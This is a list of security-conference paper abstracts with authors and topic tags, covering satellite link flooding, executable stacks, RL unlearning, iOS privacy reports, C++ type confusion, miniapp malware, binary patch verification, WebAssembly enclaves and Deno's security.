Topic: Security and privacy of systems based on machine learning, federated learning, AI, and large language models


Time-varying Bottleneck Links in LEO Satellite Networks: Identification, Exploits, and Countermeasures
Yangtao Deng (Tsinghua University); Qian Wu, Zeqi Lai (Tsinghua University and Zhongguancun Laboratory); Chenwei Gu (Tsinghua University); Hewu Li, Yuanjie Li, Jun Liu (Tsinghua University and Zhongguancun Laboratory)

Abstract: In this paper, we perform a multifaceted study on the security risk involved by the unique time-varying bottleneck links in emerging Low-Earth Orbit (LEO) satellite networks (LSNs). We carry out our study in three steps. First, we profile the spatial and temporal characteristics of bottleneck links and how they might be exploited for bottleneck identification. Thus, the bottleneck links imposes a new risk of link flooding attack (LFA) on LSNs. Second, we propose SKYFALL, a new LFA risk analyzer that enables satellite network operators to simulate various LFA behaviors and comprehensively analyze the consequences on LSN services. Concretely, SKYFALL’s analysis based on real-world information of operational LSNs demonstrates that the throughput of legal background traffic could be reduced by a factor of 3.4 if an attacker can manipulate a number of compromised user terminals to continuously congest the bottleneck links. Based on our analysis, we finally discuss the limitations of traditional LFA countermeasures and propose new mitigation strategies for LSNs.

Topics: Cyber attack (e.g., APTs, botnets, DDoS) prevention, detection, investigation, and response; Security for emerging networks (e.g., smart homes, IoT, body-area networks, VANETs); Security for future Internet architectures and designs (e.g., Software-Defined Networking) and Security for large-scale, critical infrastructures (e.g., electronic voting, smart grid)


Too Subtle to Notice: Investigating Executable Stack Issues in Linux Systems
Hengkai Ye, Hong Hu (The Pennsylvania State University)

Abstract: Code injection was a favored technique for attackers to exploit buffer overflow vulnerabilities decades ago. Subsequently, the widespread adoption of lightweight solutions like write-xor-execute (W⊕X) effectively mitigated most of these attacks by disallowing writable-and-executable memory. However, we observe multiple concerning cases where software developers accidentally disabled W⊕X and reintroduced executable stacks to popular applications. Although each violation has been properly fixed, a lingering question remains: what underlying factors contribute to these recurrent mistakes among developers, even in contemporary software development practices?

In this paper, we conduct two investigations to gain a comprehensive understanding of the challenges associated with properly enforcing W⊕X in Linux systems. First, we delve into program-hardening tools to assess whether experienced security developers consistently catch the necessary steps to avoid executable stacks. Second, we analyze the enforcement of W⊕X on Linux by inspecting the source code of the compilation toolchain, the kernel, and the loader. Our investigation reveals that properly enforcing W⊕X on Linux requires close collaboration among multiple components. These tools form a complex chain of trust and dependency to safeguard the program stack. However, developers, including security researchers, may overlook the subtle yet essential .note.GNU-stack section when writing assembly code for various purposes, and inadvertently introduce executable stacks. For example, 11 program-hardening tools implemented as inlined reference monitors (IRM) introduce executable stacks to all “hardened” applications. Based on these findings, we discuss potential exploitation scenarios by attackers and provide suggestions to mitigate this issue.

Topic: Software/firmware/hardware security analysis, customization, and extensions


TrajDeleter: Enabling Trajectory Forgetting in Offline Reinforcement Learning Agents
Chen Gong (University of Vriginia); Kecen Li (Institute of Automation, Chinese Academy of Sciences); Jin Yao, Tianhao Wang (University of Virginia)

Abstract: Reinforcement learning (RL) trains an agent from experiences interacting with the environment. In scenarios where online interactions are impractical, offline RL, which trains the agent using pre-collected datasets, has become popular. While this new paradigm presents remarkable effectiveness across various real-world domains, like healthcare and energy management, there is a growing demand to enable agents to rapidly and completely eliminate the influence of specific trajectories from both the training dataset and the trained agents. To meet this problem, this paper advocates TRAJDELETER, the first practical approach to trajectory unlearning for offline RL agents. The key idea of TRAJDELETER is to guide the agent to demonstrate deteriorating performance when it encounters states associated with unlearning trajectories. Simultaneously, it ensures the agent maintains its original performance level when facing other remaining trajectories. Additionally, we introduce TRAJAUDITOR, a simple yet efficient method to evaluate whether TRAJDELETER successfully eliminates the specific trajectories of influence from the offline RL agent. Extensive experiments conducted on six offline RL algorithms and three tasks demonstrate that TRAJDELETER requires only about 1.5% of the time needed for retraining from scratch. It effectively unlearns an average of 94.8% of the targeted trajectories yet still performs well in actual environment interactions after unlearning. The replication package and agent parameters are available.

Topic: Security and privacy of systems based on machine learning, federated learning, AI, and large language models


Transparency or Information Overload? Evaluating Users’ Comprehension and Perceptions of the iOS App Privacy Report
Xiaoyuan Wu, Lydia Hu, Eric Zeng, Hana Habib, Lujo Bauer (Carnegie Mellon University)

Abstract: Apple’s App Privacy Report (“privacy report”), released in 2021, aims to inform iOS users about apps’ access to their data and sensors (e.g., contacts, camera) and, unlike other privacy dashboards, what domains are contacted by apps and websites. To evaluate the effectiveness of the privacy report, we conducted semi-structured interviews (\textit{n} = 20) to examine users’ reactions to the information, their understanding of relevant privacy implications, and how they might change their behavior to address privacy concerns. Participants easily understood which apps accessed data and sensors at certain times on their phones, and knew how to remove an app’s permissions in case of unexpected access. In contrast, participants had difficulty understanding apps’ and websites’ network activities. They were confused about how and why network activities occurred, overwhelmed by the number of domains their apps contacted, and uncertain about what remedial actions they could take against potential privacy threats. While the privacy report and similar tools can increase transparency by presenting users with details about how their data is handled, we recommend providing more interpretation or aggregation of technical details, such as the purpose of contacting domains, to help users make informed decisions.

Topic: Security and privacy of mobile/smartphone platforms and their operating systems and Usable security and privacy


Tweezers: A Framework for Security Event Detection via Event Attribution-centric Tweet Embedding
Jian Cui (Indiana University); Hanna Kim (KAIST); Eugene Jang, Dayeon Yim, Kicheol Kim, Yongjae Lee, Jin-Woo Chung (S2W Inc.); Seungwon Shin (KAIST); Xiaojing Liao (Indiana University)

Abstract: Twitter is recognized as a crucial platform for the dissemination and gathering of Cyber Threat Intelligence (CTI). Its capability to provide real-time, actionable intelligence makes it a indispensable tool for detecting security events, helping security professionals cope with ever-growing threats. However, the large volume of tweets and inherent noises of human-crafted tweets pose significant challenges in accurately identifying security events. While many studies tried to filter out event-related tweets based on keywords, they are not effective due to their limitation in understanding the semantics of tweets. Another challenge in security event detection from Twitter is the comprehensive coverage of security events. Previous studies emphasized the importance of early detection of security events, but they overlooked the importance of event coverage. To cope with these challenges, in our study, we introduce a novel event attribution-centric tweet embedding method to enable the high precision and coverage of events. Our experiment result shows that the proposed method outperforms existing text and graph-based tweet embedding methods in identifying security events. Leveraging this novel embedding approach, we have developed and implemented a framework, \textit{Tweezers}, that is applicable to security event detection from Twitter for CTI gathering. This framework has demonstrated its effectiveness, detecting twice as many events compared to established baselines. Additionally, we have showcased two applications, built on \textit{Tweezers} for the integration and inspection of security events, i.e., security event trend analysis and informative security user identification.

Topic: Cyber-crime defense and forensics (e.g., anti-phishing, anti-blackmailing, anti-fraud techniques)


type++: Prohibiting Type Confusion with Inline Type Information
Nicolas Badoux (EPFL); Flavio Toffalini (Ruhr-Universitat Bochum and EPFL); Yuseok Jeon (UNIST); Mathias Payer (EPFL)

Abstract: Type confusion, or bad casting, is a common C++ attack vector. Such vulnerabilities cause a program to interpret an object as belonging to a different type, enabling powerful attacks, like control-flow hijacking. C++ limits runtime checks to polymorphic classes because only those have inline type information. The lack of runtime type information throughout an object’s lifetime makes it challenging to enforce continuous checks and thereby prevent type confusion during downcasting. Current solutions either record type information for all objects disjointly, incurring prohibitive runtime overhead, or restrict protection to a fraction of all objects.

Our C++ dialect, type++, enforces the paradigm that each allocated object involved in downcasting carries type information throughout its lifetime, ensuring correctness by enabling type checks wherever and whenever necessary. As not just polymorphic objects but all objects are typed, all down-to casts can now be dynamically verified. Compared to existing solutions, our strategy greatly reduces runtime cost and enables type++ usage both during testing and as mitigation. Targeting SPEC CPU2006 and CPU2017, we compile and run 2,040 kLoC, while changing only 314 LoC. To help developers, our static analysis warns where code changes in target programs may be necessary. Running the compiled benchmarks results in negligible performance overhead (1.19% on SPEC CPU2006 and 0.82% on SPEC CPU2017) verifying a total of 90B casts (compared to 3.8B for the state-of-the-art, a 23√ó improvement). type++ discovers 122 type confusion issues in the SPEC CPU benchmarks among which 62 are new. Targeting Chromium, we change 229 LoC out of 35 MLoC to protect 94.6% of the classes that could be involved in downcasting vulnerabilities, while incurring only 0.98% runtime overhead compared to the baseline.

Topic: Software/firmware/hardware security analysis, customization, and extensions


Understanding Data Importance in Machine Learning Attacks: Does Valuable Data Pose Greater Harm?
Rui Wen, Michael Backes, Yang Zhang (CISPA Helmholtz Center for Information Security)

Abstract: Machine learning has revolutionized numerous domains, playing a crucial role in driving advancements and enabling data-centric processes. The significance of data in training models and shaping their performance cannot be overstated. Recent research has highlighted the heterogeneous impact of individual data samples, particularly the presence of valuable data that significantly contributes to the utility and effectiveness of machine learning models. However, a critical question remains unanswered: are these valuable data samples more vulnerable to machine learning attacks? In this work, we investigate the relationship between data importance and machine learning attacks by analyzing five distinct attack types. Our findings reveal notable insights. For example, we observe that high importance data samples exhibit increased vulnerability in certain attacks, such as membership inference and model stealing. These findings also carry practical implications, inspiring researchers to design more efficient attacks. By analyzing the linkage between membership inference vulnerability and data importance, we demonstrate that sample characteristics can be integrated into membership metrics by introducing sample-specific criteria, therefore enhancing the membership inference performance. These findings emphasize the urgent need for innovative defense mechanisms that strike a balance between maximizing utility and safeguarding valuable data against potential exploitation.

Topic: Security and privacy of systems based on machine learning, federated learning, AI, and large language models


Understanding the Miniapp Malware: Identification, Dissection, and Characterization
Yuqing Yang (The Ohio State University); Yue Zhang (Drexel University); Zhiqiang Lin (The Ohio State University)

Abstract: Super apps, serving as centralized platforms that manage user information and integrate third-party miniapps, have revolutionized mobile computing but also introduced significant security risks from malicious miniapps. Despite the mandatory miniapp vetting enforced to the built-in miniapp store, the threat of evolving miniapp malware persists, engaging in a continual cat-and-mouse game with platform security measures. However, compared with traditional paradigms such as mobile and web computing, there has been a lack of miniapp malware dataset available for the community to explore, hindering the generation of crucial insights and the development of robust detection techniques. In response to this, this paper addresses the scarcely explored territory of malicious miniapp analysis, dedicating over three year to identifying, dissecting, and examining the risks posed by these miniapps, resulting in the first miniapp malware dataset now available to aid future studies to enhance the security of super app ecosystems.

To build the dataset, our primary focus has been on the WeChat platform, the largest super app, hosting millions of miniapps and serving a billion users. Over an extensive period, we collected over 4.5 million miniapps, identifying a subset (19, 905) as malicious through a rigorous cross-check process: 1) applying static signatures derived from real-world cases, and 2) confirming that the miniapps were delisted and removed from the market by the platform. With these identified samples, we proceed to characterize them, focusing on their lifecycle including propagation, activation, as well as payload execution. Additionally, we analyzed the collected malware samples using real-world cases to demonstrate their practical security impact. Our findings reveal that these malware frequently target user privacy, leverage social network sharing capabilities to disseminate unauthorized services, and manipulate the advertisement-based revenue model to illicitly generate profits. These actions result in significant privacy and financial harm to both users and the platform.

Topic: Anti-malware techniques: detection, analysis, and prevention


VeriBin: Adaptive Verification of Patches at the Binary Level
Hongwei Wu (Purdue University); Jianliang Wu (Simon Fraser University); Ruoyu Wu, Ayushi Sharma, Aravind Machiry, Antonio Bianchi (Purdue University)

Abstract: Vendors are often provided with updated versions of a piece of software, fixing known security issues. However, the inability to have any guarantee that the provided patched software does not break the functionality of its original version often hinders patch deployment. This issue is particularly severe when the patched software is only provided in its compiled binary form. In this case, manual analysis of the patch’s source code is impossible, and existing automated patch analysis techniques, which rely on source code, are not applicable. Even when the source code is accessible, the necessity of binary-level patch verification is still crucial, as highlighted by the recent XZ Utils backdoor.

To tackle this issue, we propose VeriBin, a system able to compare a binary with its patched version and determine whether the patch is ”Safe to Apply”, meaning it does not introduce any modification that could potentially break the functionality of the original binary. To achieve this goal, VeriBin checks functional equivalence between the original and patched binaries. In particular, VeriBin first uses symbolic execution to systematically identify patch-introduced modifications. Then, it checks if the detected patch-introduced modifications respect specific properties that guarantee they will not break the original binary’s functionality. To work without source code, VeriBin’s design solves several challenges related to the absence of semantic information (removed during the compilation process) about the analyzed code and the complexity of symbolically executing large functions precisely. Our evaluation of VeriBin on a dataset of 86 samples shows that it achieves an accuracy of 93.0% with no false positives, requiring only minimal analyst input. Additionally, we showcase how VeriBin can be used to detect the recently discovered XZ Utils backdoor.

Topic: Software/firmware/hardware security analysis, customization, and extensions


WAVEN: WebAssembly Memory Virtualization for Enclaves
Weili Wang (Southern University of Science and Technology); Honghan Ji, Peixuan He, Yao Zhang, Ye Wu (ByteDance Inc.); Yinqian Zhang (Southern University of Science and Technology)

Abstract: The advancement of trusted execution environments (TEEs) has enabled the confidential computing paradigm and created new application scenarios for WebAssembly (Wasm). “Wasm+TEE” designs achieve in-enclave multi-tenancy with strong isolation, facilitating concurrent execution of untrusted code instances from multiple users. However, the linear memory model of Wasm lacks efficient cross-module data sharing and fine-grained memory access control, significantly restricting its applications in certain confidential computing scenarios where secure data sharing is essential (e.g., confidential stateful FaaS and data marketplaces). In this paper, we propose WAVEN (WebAssembly Memory Virtualization for ENclaves), a novel WebAssembly memory virtualization scheme, to enable memory sharing among Wasm modules and page-level access control. We implement WAVEN atop WAMR, a popular Wasm runtime for TEEs, and empirically demonstrate its efficiency and effectiveness. To the best of our knowledge, our work represents the first approach that enables cross-module memory sharing with fine-grained memory access control in Wasm.

Topic: Trustworthy computing software and hardware to secure networks and systems


Welcome to Jurassic Park: A Comprehensive Study of Security Risks in Deno and its Ecosystem
Abdullah AlHamdan, Cristian-Alexandru Staicu (CISPA Helmholtz Center for Information Security)

Abstract: Node.js and its ecosystem npm are notoriously insecure, enabling the proliferation of supply chain attacks. Deno is an emerging runtime that promises to offer a safer alternative for running untrusted JavaScript code outside of the browser. Learning from Node.js’s mistakes, Deno is written in Rust, a memory-safe programming language, and it includes a strict permission system that checks all accesses to sensitive APIs via static or runtime permissions. Deno also allows the inclusion of third-party code via URLs, which promises a more transparent way of handling dependencies, advocating for a fully decentralized software supply chain. In this paper, we study if Deno delivers on its promise of increased security. We find that indeed Deno has a smaller attack surface than Node.js, but there still are known attacks that are not addressed (ReDoS) or only partially mitigated (prototype pollution). Moreover, we find several weaknesses in Deno’s permission system, which allow sophisticated supply chain attacks. First, coarse-grained permissions allow attackers to abuse the ambient authority of the operating system to sidestep the permission system. Second, we find that URL imports are exempted from the permission checks, allowing attackers to perform unlawful network requests. We also identify time-of-check to time-of-use issues when handling symbolic links, making fine-grained file system access control ineffective. We then perform an empirical study of Deno’s main ecosystem deno.land to understand how developers consume third-party code and how permissions are used and communicated. We identify classical URL-related issues such as expired domains and reliance on insecure transport protocols, but we also find that it is challenging to guarantee uniform immutability and version control when multiple domains are involved in code distribution. We also provide initial evidence that developers poorly document required permissions on deno.land and that they tend to abuse coarse-grained permissions, reducing the benefits of the permission system. Our findings resulted in two security advisories for Deno and a redesign of its import mechanism. We also make concrete recommendations for improving Deno’s security model to further prevent supply chain attacks: add import permissions, additional access control at file system level, support for compartmentalization, and a manifest file that persists fine-grained permissions.

Topic: Security of web-based applications and services (e.g., social networking, crowd-sourcing, fake news/disinformation), web security and privacy